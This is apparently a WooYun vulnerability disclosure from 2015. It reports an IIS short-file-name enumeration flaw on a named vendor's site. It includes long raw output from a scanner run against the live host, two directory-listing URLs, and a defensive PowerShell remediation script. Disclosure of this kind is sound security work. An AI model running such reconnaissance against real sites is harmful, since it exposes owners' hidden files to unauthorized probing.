Vulnerability Summary

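Bug ID: wooyun-2015-0119558

Title: Short file name vulnerability on a 品高软件 site

Vendor: bingocc.com

Author: 0c0c0f

Submitted: 2015-06-10 15:18

Fix time: 2015-06-15 15:20

Public disclosure: 2015-06-15 15:20

Type: System/service operations misconfiguration

Severity: Low

Self-assessed Rank: 5

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]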

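Vulnerability Details

Disclosure status:

2015-06-10: Details sent to the vendor; waiting for the vendor to respond
2015-06-15: The vendor chose to ignore the vulnerability; details released to the public

Brief description:

Why this vulnerability matters:
Guessing the admin backend address.
Guessing sensitive files, such as backup rar, zip, .bak and .SQL files.
In some cases, the corresponding file can even be downloaded directly over the web using its short file name, for example a backup SQL file.

Detailed description:

The following domain is affected by the IIS short file name vulnerability:
http://www.bingosoft.net/
Proof: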
[root@pentest scan]# python iis_shortname_Scan.py http://www.bingosoft.net/
server is vulerable, please wait, scanning...
----------------------------------------------------------------
Dir: /downlo~1
Dir: /templa~1
File: /baidu_~1.htm
File: /abd9e4~1.htm
File: /about-~1.htm
File: /ab6315~1.htm
File: /dya71c~1.htm
File: /dynami~1.htm
File: /dy639b~1.htm
File: /hra567~1.htm
File: /hra588~1.htm
File: /hra7fd~1.htm
File: /hrf482~1.htm
File: /hr61c4~1.htm
File: /hr8c11~1.htm
File: /hr8ea7~1.htm
File: /hr8e86~1.htm
File: /hr8300~1.htm
File: /hr_new~1.htm
File: /hr-aff~1.htm
File: /hr-faz~1.htm
File: /hr-hou~1.htm
File: /hr-hum~1.htm
File: /hr-new~1.htm
File: /hr-pei~1.htm
File: /hr-soc~1.htm
File: /hr-rec~1.htm
File: /hr-xin~1.htm
File: /hr-zhi~1.htm
File: /indust~1.htm
File: /ned4f8~1.htm
File: /neb3e5~1.htm
File: /newsad~1.htm
File: /news1-~1.htm
File: /news2-~1.htm
File: /ne24ab~1.htm
File: /ne136b~1.htm
File: /ne7039~1.htm
File: /ne9990~1.htm
File: /ne5f16~1.htm
File: /ne57c1~1.htm
File: /market~1.htm
File: /seea02~1.htm
File: /sef5c7~1.htm
File: /sea833~1.htm
File: /servic~1.htm
File: /se1f2f~1.htm
File: /se15ef~1.htm
File: /se6274~1.htm
File: /se4e55~1.htm
File: /se8bdb~1.htm
File: /se7543~1.htm
File: /socd8f~1.htm
File: /softwa~1.htm
File: /so9a2f~1.htm
File: /so99ef~1.htm
File: /so8208~1.htm
File: /so88af~1.htm
----------------------------------------------------------------
2 Directories, 56 Files found in toal

Proof of vulnerability:

[root@pentest scan]# python iis_shortname_Scan.py http://www.bingosoft.net/
server is vulerable, please wait, scanning...
Found /hra567*m** [scan in progress]
Found /hra567*t** [scan in progress]
Found /hra588*h** [scan in progress]
Found /hra588*m** [scan in progress]
Found /hra588*t** [scan in progress]
Found /hra7fd*h** [scan in progress]
Found /hra7fd*m** [scan in progress]
Found /hra7fd*t** [scan in progress]
Found /hrf482*h** [scan in progress]
Found /hrf482*m** [scan in progress]
Found /hrf482*t** [scan in progress]
Found /hr61c4*h** [scan in progress]
Found /hr61c4*m** [scan in progress]
Found /hr61c4*t** [scan in progress]
Found /hr8c11*h** [scan in progress]
Found /hr8c11*m** [scan in progress]
Found /hr8c11*t** [scan in progress]
Found /hr8ea7*h** [scan in progress]
Found /hr8ea7*m** [scan in progress]
Found /hr8ea7*t** [scan in progress]
Found /hr8e86*h** [scan in progress]
Found /hr8e86*m** [scan in progress]
Found /hr8e86*t** [scan in progress]
Found /hr8300*h** [scan in progress]
Found /hr8300*m** [scan in progress]
Found /hr8300*t** [scan in progress]
Found /hr_new*h** [scan in progress]
Found /hr_new*m** [scan in progress]
Found /hr_new*t** [scan in progress]
Found /hr-aff*h** [scan in progress]
Found /hr-aff*m** [scan in progress]
Found /hr-aff*t** [scan in progress]
Found /hr-faz*h** [scan in progress]
Found /hr-faz*m** [scan in progress]
Found /hr-faz*t** [scan in progress]
Found /hr-hou*h** [scan in progress]
Found /hr-hou*m** [scan in progress]
Found /hr-hou*t** [scan in progress]
Found /hr-hum*h** [scan in progress]
Found /hr-hum*m** [scan in progress]
Found /hr-hum*t** [scan in progress]
Found /hr-new*h** [scan in progress]
Found /hr-new*m** [scan in progress]
Found /hr-new*t** [scan in progress]
Found /hr-pei*h** [scan in progress]
Found /hr-pei*m** [scan in progress]
Found /hr-pei*t** [scan in progress]
Found /hr-soc*m** [scan in progress]
Found /hr-soc*h** [scan in progress]
Found /hr-soc*t** [scan in progress]
Found /hr-rec*h** [scan in progress]
Found /hr-rec*m** [scan in progress]
Found /hr-rec*t** [scan in progress]
Found /hr-xin*h** [scan in progress]
Found /hr-xin*m** [scan in progress]
Found /hr-xin*t** [scan in progress]
Found /hr-zhi*h** [scan in progress]
Found /hr-zhi*m** [scan in progress]
Found /hr-zhi*t** [scan in progress]
Found /indust*h** [scan in progress]
Found /indust*m** [scan in progress]
Found /indust*t** [scan in progress]
Found /ned4f8*h** [scan in progress]
Found /ned4f8*m** [scan in progress]
Found /ned4f8*t** [scan in progress]
Found /neb3e5*h** [scan in progress]
Found /neb3e5*m** [scan in progress]
Found /neb3e5*t** [scan in progress]
Found /newsad*h** [scan in progress]
Found /newsad*m** [scan in progress]
Found /newsad*t** [scan in progress]
Found /news1-*h** [scan in progress]
Found /news1-*m** [scan in progress]
Found /news1-*t** [scan in progress]
Found /news2-*h** [scan in progress]
Found /news2-*m** [scan in progress]
Found /news2-*t** [scan in progress]
Found /ne24ab*m** [scan in progress]
Found /ne24ab*h** [scan in progress]
Found /ne24ab*t** [scan in progress]
Found /ne136b*h** [scan in progress]
Found /ne136b*m** [scan in progress]
Found /ne136b*t** [scan in progress]
Found /ne7039*h** [scan in progress]
Found /ne7039*m** [scan in progress]
Found /ne7039*t** [scan in progress]
Found /ne9990*h** [scan in progress]
Found /ne9990*m** [scan in progress]
Found /ne9990*t** [scan in progress]
Found /ne5f16*h** [scan in progress]
Found /ne5f16*m** [scan in progress]
Found /ne5f16*t** [scan in progress]
Found /ne57c1*h** [scan in progress]
Found /ne57c1*m** [scan in progress]
Found /ne57c1*t** [scan in progress]
Found /market*h** [scan in progress]
Found /market*m** [scan in progress]
Found /market*t** [scan in progress]
Found /seea02*h** [scan in progress]
Found /seea02*m** [scan in progress]
Found /seea02*t** [scan in progress]
Found /sef5c7*h** [scan in progress]
Found /sef5c7*m** [scan in progress]
Found /sef5c7*t** [scan in progress]
Found /sea833*h** [scan in progress]
Found /sea833*m** [scan in progress]
Found /sea833*t** [scan in progress]
Found /servic*h** [scan in progress]
Found /servic*m** [scan in progress]
Found /servic*t** [scan in progress]
Found /se1f2f*h** [scan in progress]
Found /se1f2f*m** [scan in progress]
Found /se1f2f*t** [scan in progress]
Found /se15ef*h** [scan in progress]
Found /se15ef*m** [scan in progress]
Found /se15ef*t** [scan in progress]
Found /se6274*h** [scan in progress]
Found /se6274*m** [scan in progress]
Found /se6274*t** [scan in progress]
Found /se4e55*h** [scan in progress]
Found /se4e55*m** [scan in progress]
Found /se4e55*t** [scan in progress]
Found /se8bdb*h** [scan in progress]
Found /se8bdb*m** [scan in progress]
Found /se8bdb*t** [scan in progress]
Found /se7543*h** [scan in progress]
Found /se7543*m** [scan in progress]
Found /se7543*t** [scan in progress]
Found /socd8f*m** [scan in progress]
Found /socd8f*h** [scan in progress]
Found /socd8f*t** [scan in progress]
Found /softwa*h** [scan in progress]
Found /softwa*m** [scan in progress]
Found /softwa*t** [scan in progress]
Found /so9a2f*h** [scan in progress]
Found /so9a2f*m** [scan in progress]
Found /so9a2f*t** [scan in progress]
Found /so99ef*h** [scan in progress]
Found /so99ef*m** [scan in progress]
Found /so99ef*t** [scan in progress]
Found /so8208*m** [scan in progress]
Found /so8208*h** [scan in progress]
Found /so8208*t** [scan in progress]
Found /so88af*m** [scan in progress]
Found /so88af*h** [scan in progress]
Found /so88af*t** [scan in progress]
Found /templa [scan in progress]
Found Dir /templa~1 [Done]
Found /baidu_*ht* [scan in progress]
Found /baidu_*tm* [scan in progress]
Found /abd9e4*ht* [scan in progress]
Found /abd9e4*tm* [scan in progress]
Found /about-*ht* [scan in progress]
Found /about-*tm* [scan in progress]
Found /ab6315*ht* [scan in progress]
Found /ab6315*tm* [scan in progress]
Found /dya71c*ht* [scan in progress]
Found /dya71c*tm* [scan in progress]
Found /dynami*ht* [scan in progress]
Found /dynami*tm* [scan in progress]
Found /dy639b*ht* [scan in progress]
Found /dy639b*tm* [scan in progress]
Found /hra567*ht* [scan in progress]
Found /hra567*tm* [scan in progress]
Found /hra588*ht* [scan in progress]
Found /hra588*tm* [scan in progress]
Found /hra7fd*ht* [scan in progress]
Found /hra7fd*tm* [scan in progress]
Found /hrf482*ht* [scan in progress]
Found /hrf482*tm* [scan in progress]
Found /hr61c4*ht* [scan in progress]
Found /hr61c4*tm* [scan in progress]
Found /hr8c11*ht* [scan in progress]
Found /hr8c11*tm* [scan in progress]
Found /hr8ea7*ht* [scan in progress]
Found /hr8ea7*tm* [scan in progress]
Found /hr8e86*ht* [scan in progress]
Found /hr8e86*tm* [scan in progress]
Found /hr8300*ht* [scan in progress]
Found /hr8300*tm* [scan in progress]
Found /hr_new*ht* [scan in progress]
Found /hr_new*tm* [scan in progress]
Found /hr-aff*ht* [scan in progress]
Found /hr-aff*tm* [scan in progress]
Found /hr-faz*ht* [scan in progress]
Found /hr-faz*tm* [scan in progress]
Found /hr-hou*ht* [scan in progress]
Found /hr-hou*tm* [scan in progress]
Found /hr-hum*ht* [scan in progress]
Found /hr-hum*tm* [scan in progress]
Found /hr-new*ht* [scan in progress]
Found /hr-new*tm* [scan in progress]
Found /hr-pei*ht* [scan in progress]
Found /hr-pei*tm* [scan in progress]
Found /hr-soc*ht* [scan in progress]
Found /hr-soc*tm* [scan in progress]
Found /hr-rec*ht* [scan in progress]
Found /hr-rec*tm* [scan in progress]
Found /hr-xin*ht* [scan in progress]
Found /hr-xin*tm* [scan in progress]
Found /hr-zhi*ht* [scan in progress]
Found /hr-zhi*tm* [scan in progress]
Found /indust*ht* [scan in progress]
Found /indust*tm* [scan in progress]
Found /ned4f8*ht* [scan in progress]
Found /ned4f8*tm* [scan in progress]
Found /neb3e5*ht* [scan in progress]
Found /neb3e5*tm* [scan in progress]
Found /newsad*ht* [scan in progress]
Found /newsad*tm* [scan in progress]
Found /news1-*ht* [scan in progress]
Found /news1-*tm* [scan in progress]
Found /news2-*ht* [scan in progress]
Found /news2-*tm* [scan in progress]
Found /ne24ab*ht* [scan in progress]
Found /ne24ab*tm* [scan in progress]
Found /ne136b*ht* [scan in progress]
Found /ne136b*tm* [scan in progress]
Found /ne7039*ht* [scan in progress]
Found /ne7039*tm* [scan in progress]
Found /ne9990*ht* [scan in progress]
Found /ne9990*tm* [scan in progress]
Found /ne5f16*ht* [scan in progress]
Found /ne5f16*tm* [scan in progress]
Found /ne57c1*ht* [scan in progress]
Found /ne57c1*tm* [scan in progress]
Found /market*ht* [scan in progress]
Found /market*tm* [scan in progress]
Found /seea02*ht* [scan in progress]
Found /seea02*tm* [scan in progress]
Found /sef5c7*ht* [scan in progress]
Found /sef5c7*tm* [scan in progress]
Found /sea833*ht* [scan in progress]
Found /sea833*tm* [scan in progress]
Found /servic*ht* [scan in progress]
Found /servic*tm* [scan in progress]
Found /se1f2f*ht* [scan in progress]
Found /se1f2f*tm* [scan in progress]
Found /se15ef*ht* [scan in progress]
Found /se15ef*tm* [scan in progress]
Found /se6274*ht* [scan in progress]
Found /se6274*tm* [scan in progress]
Found /se4e55*ht* [scan in progress]
Found /se4e55*tm* [scan in progress]
Found /se8bdb*ht* [scan in progress]
Found /se8bdb*tm* [scan in progress]
Found /se7543*ht* [scan in progress]
Found /se7543*tm* [scan in progress]
Found /socd8f*ht* [scan in progress]
Found /socd8f*tm* [scan in progress]
Found /softwa*ht* [scan in progress]
Found /softwa*tm* [scan in progress]
Found /so9a2f*ht* [scan in progress]
Found /so9a2f*tm* [scan in progress]
Found /so99ef*ht* [scan in progress]
Found /so99ef*tm* [scan in progress]
Found /so8208*ht* [scan in progress]
Found /so8208*tm* [scan in progress]
Found /so88af*ht* [scan in progress]
Found /so88af*tm* [scan in progress]
Found /baidu_*htm [scan in progress]
Found File /baidu_~1.htm [Done]
Found /abd9e4*htm [scan in progress]
Found File /abd9e4~1.htm [Done]
Found /about-*htm [scan in progress]
Found File /about-~1.htm [Done]
Found /ab6315*htm [scan in progress]
Found File /ab6315~1.htm [Done]
Found /dya71c*htm [scan in progress]
Found File /dya71c~1.htm [Done]
Found /dynami*htm [scan in progress]
Found File /dynami~1.htm [Done]
Found /dy639b*htm [scan in progress]
Found File /dy639b~1.htm [Done]
Found /hra567*htm [scan in progress]
Found File /hra567~1.htm [Done]
Found /hra588*htm [scan in progress]
Found File /hra588~1.htm [Done]
Found /hra7fd*htm [scan in progress]
Found File /hra7fd~1.htm [Done]
Found /hrf482*htm [scan in progress]
Found File /hrf482~1.htm [Done]
Found /hr61c4*htm [scan in progress]
Found File /hr61c4~1.htm [Done]
Found /hr8c11*htm [scan in progress]
Found File /hr8c11~1.htm [Done]
Found /hr8ea7*htm [scan in progress]
Found File /hr8ea7~1.htm [Done]
Found /hr8e86*htm [scan in progress]
Found File /hr8e86~1.htm [Done]
Found /hr8300*htm [scan in progress]
Found File /hr8300~1.htm [Done]
Found /hr_new*htm [scan in progress]
Found File /hr_new~1.htm [Done]
Found /hr-aff*htm [scan in progress]
Found File /hr-aff~1.htm [Done]
Found /hr-faz*htm [scan in progress]
Found File /hr-faz~1.htm [Done]
Found /hr-hou*htm [scan in progress]
Found File /hr-hou~1.htm [Done]
Found /hr-hum*htm [scan in progress]
Found File /hr-hum~1.htm [Done]
Found /hr-new*htm [scan in progress]
Found File /hr-new~1.htm [Done]
Found /hr-pei*htm [scan in progress]
Found File /hr-pei~1.htm [Done]
Found /hr-soc*htm [scan in progress]
Found File /hr-soc~1.htm [Done]
Found /hr-rec*htm [scan in progress]
Found File /hr-rec~1.htm [Done]
Found /hr-xin*htm [scan in progress]
Found File /hr-xin~1.htm [Done]
Found /hr-zhi*htm [scan in progress]
Found File /hr-zhi~1.htm [Done]
Found /indust*htm [scan in progress]
Found File /indust~1.htm [Done]
Found /ned4f8*htm [scan in progress]
Found File /ned4f8~1.htm [Done]
Found /neb3e5*htm [scan in progress]
Found File /neb3e5~1.htm [Done]
Found /newsad*htm [scan in progress]
Found File /newsad~1.htm [Done]
Found /news1-*htm [scan in progress]
Found File /news1-~1.htm [Done]
Found /news2-*htm [scan in progress]
Found File /news2-~1.htm [Done]
Found /ne24ab*htm [scan in progress]
Found File /ne24ab~1.htm [Done]
Found /ne136b*htm [scan in progress]
Found File /ne136b~1.htm [Done]
Found /ne7039*htm [scan in progress]
Found File /ne7039~1.htm [Done]
Found /ne9990*htm [scan in progress]
Found File /ne9990~1.htm [Done]
Found /ne5f16*htm [scan in progress]
Found File /ne5f16~1.htm [Done]
Found /ne57c1*htm [scan in progress]
Found File /ne57c1~1.htm [Done]
Found /market*htm [scan in progress]
Found File /market~1.htm [Done]
Found /seea02*htm [scan in progress]
Found File /seea02~1.htm [Done]
Found /sef5c7*htm [scan in progress]
Found File /sef5c7~1.htm [Done]
Found /sea833*htm [scan in progress]
Found File /sea833~1.htm [Done]
Found /servic*htm [scan in progress]
Found File /servic~1.htm [Done]
Found /se1f2f*htm [scan in progress]
Found File /se1f2f~1.htm [Done]
Found /se15ef*htm [scan in progress]
Found File /se15ef~1.htm [Done]
Found /se6274*htm [scan in progress]
Found File /se6274~1.htm [Done]
Found /se4e55*htm [scan in progress]
Found File /se4e55~1.htm [Done]
Found /se8bdb*htm [scan in progress]
Found File /se8bdb~1.htm [Done]
Found /se7543*htm [scan in progress]
Found File /se7543~1.htm [Done]
Found /socd8f*htm [scan in progress]
Found File /socd8f~1.htm [Done]
Found /softwa*htm [scan in progress]
Found File /softwa~1.htm [Done]
Found /so9a2f*htm [scan in progress]
Found File /so9a2f~1.htm [Done]
Found /so99ef*htm [scan in progress]
Found File /so99ef~1.htm [Done]
Found /so8208*htm [scan in progress]
Found File /so8208~1.htm [Done]
Found /so88af*htm [scan in progress]
Found File /so88af~1.htm [Done]
----------------------------------------------------------------
Dir: /downlo~1
Dir: /templa~1
File: /baidu_~1.htm
File: /abd9e4~1.htm
File: /about-~1.htm
File: /ab6315~1.htm
File: /dya71c~1.htm
File: /dynami~1.htm
File: /dy639b~1.htm
File: /hra567~1.htm
File: /hra588~1.htm
File: /hra7fd~1.htm
File: /hrf482~1.htm
File: /hr61c4~1.htm
File: /hr8c11~1.htm
File: /hr8ea7~1.htm
File: /hr8e86~1.htm
File: /hr8300~1.htm
File: /hr_new~1.htm
File: /hr-aff~1.htm
File: /hr-faz~1.htm
File: /hr-hou~1.htm
File: /hr-hum~1.htm
File: /hr-new~1.htm
File: /hr-pei~1.htm
File: /hr-soc~1.htm
File: /hr-rec~1.htm
File: /hr-xin~1.htm
File: /hr-zhi~1.htm
File: /indust~1.htm
File: /ned4f8~1.htm
File: /neb3e5~1.htm
File: /newsad~1.htm
File: /news1-~1.htm
File: /news2-~1.htm
File: /ne24ab~1.htm
File: /ne136b~1.htm
File: /ne7039~1.htm
File: /ne9990~1.htm
File: /ne5f16~1.htm
File: /ne57c1~1.htm
File: /market~1.htm
File: /seea02~1.htm
File: /sef5c7~1.htm
File: /sea833~1.htm
File: /servic~1.htm
File: /se1f2f~1.htm
File: /se15ef~1.htm
File: /se6274~1.htm
File: /se4e55~1.htm
File: /se8bdb~1.htm
File: /se7543~1.htm
File: /socd8f~1.htm
File: /softwa~1.htm
File: /so9a2f~1.htm
File: /so99ef~1.htm
File: /so8208~1.htm
File: /so88af~1.htm
----------------------------------------------------------------
2 Directories, 56 Files found in toal
Bonus: a directory listing vulnerability
http://cloudos.bingocloud.cn/system/
http://cloudos.bingocloud.cn/var

Remediation:

1) Upgrade the .NET Framework.
2) Modify the registry value:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
Set NtfsDisable8dot3NameCreation to 1.
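
The registry change above only stops NTFS from creating new 8.3 names; files that already have one keep it until they are re-created or the names are stripped. The following PowerShell sketch is an added example, not part of the original report: it checks the value, applies it, and lists content that still carries a short name. The `$WebRoot` path is an assumption.

```powershell
# Added example, not from the original report. Run in an elevated session.
# $WebRoot is an assumed path; point it at the site's actual content directory.
$WebRoot = 'C:\inetpub\wwwroot'
$Key     = 'HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem'
$Name    = 'NtfsDisable8dot3NameCreation'

# 1. Read the current value.
#    0 = short names created on all volumes   1 = disabled on all volumes
#    2 = decided per volume                   3 = disabled except on the system volume
$current = (Get-ItemProperty -Path $Key -Name $Name).$Name
Write-Output "$Name is currently $current"

# 2. Apply the value the report recommends.
if ($current -ne 1) {
    Set-ItemProperty -Path $Key -Name $Name -Value 1 -Type DWord
    Write-Output "$Name set to 1; restart the server so the change takes effect"
}

# 3. The setting does not remove short names that already exist.
#    FileSystemObject returns the long name when an item has no separate short name,
#    so any mismatch means an 8.3 alias is still present.
$fso = New-Object -ComObject Scripting.FileSystemObject
$leftover = foreach ($item in Get-ChildItem -LiteralPath $WebRoot -Recurse -Force) {
    $short = if ($item.PSIsContainer) {
        $fso.GetFolder($item.FullName).ShortName
    } else {
        $fso.GetFile($item.FullName).ShortName
    }
    if ($short -ne $item.Name) {
        [pscustomobject]@{ ShortName = $short; Path = $item.FullName }
    }
}
$leftover | Format-Table -AutoSize | Out-Host
Write-Output ("{0} item(s) under {1} still have a short name" -f @($leftover).Count, $WebRoot)

# 4. Preview stripping the leftovers.
#    /t = test mode (nothing is removed), /s = recurse, /v = verbose.
if (@($leftover).Count -gt 0) {
    fsutil 8dot3name strip /t /s /v $WebRoot
}
```

Review the test-mode output before running the strip without `/t`, since anything that refers to a file by its short name stops resolving once the alias is gone.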

Copyright notice: when reposting, please credit the source: 0c0c0f@WooYun


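Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2015-06-15 15:20

Vendor reply:

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2015-07-18 10:18 | 0c0c0f (Intern White Hat | Rank: 48, Vulnerabilities: 15 | My H34rt c4n 3xploit 4ny h0les!)

    They asked for my contact information, and then ignored it...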